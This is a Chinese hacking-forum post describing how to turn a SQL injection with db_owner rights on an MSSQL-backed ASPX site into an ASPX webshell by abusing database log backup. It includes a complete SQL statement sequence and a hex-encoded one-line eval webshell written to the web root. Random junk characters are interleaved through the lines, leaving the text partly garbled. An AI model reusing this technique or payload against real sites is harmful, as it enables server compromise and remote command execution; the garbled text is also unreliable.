最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
1 W, D# f1 s' S2 A+ ^; M7 l* o但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。9 h+ R! h' n4 c' `! o
经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。4 ?' H0 F z" _% r- ~/ r0 Q* W
经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。
' l# R( @2 j& p# p
) W* c6 @7 T/ k8 f& ?--------------------------------------------------------------$ k% t9 G) A, I# c" z8 l7 N& j9 x0 R
今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,, d% Z0 P+ Q+ F @4 x N
自己修改备份语句如下:
* T# w) q; |) O- G2 M. o7 L! c3 c; [Drop table cmd;--, J. Z+ m' ~4 t" [6 s
alter database db_test set RECOVERY FULL;--. Q/ X9 D& @6 c% Z; K4 V+ j
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段& U+ r. B+ v- m& h6 D, L) b3 V$ J
backup log db_test to disk = 'c:\bak' with init;--
- W, R7 ]# x$ r% |. b. X; Binsert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--5 S' @3 m Z. o8 u
delete from cmd where id>1;--删除id>1的数据5 ?: [! t c( ~4 P8 x# W9 f* G
backup log db_test to disk = 'e:\webroot\test.aspx';--- U) L* a" w$ w$ X3 M6 O5 o1 f3 E
Drop table cmd;--
. U, S. i2 D' B' s" }& g希望对大家有用。 |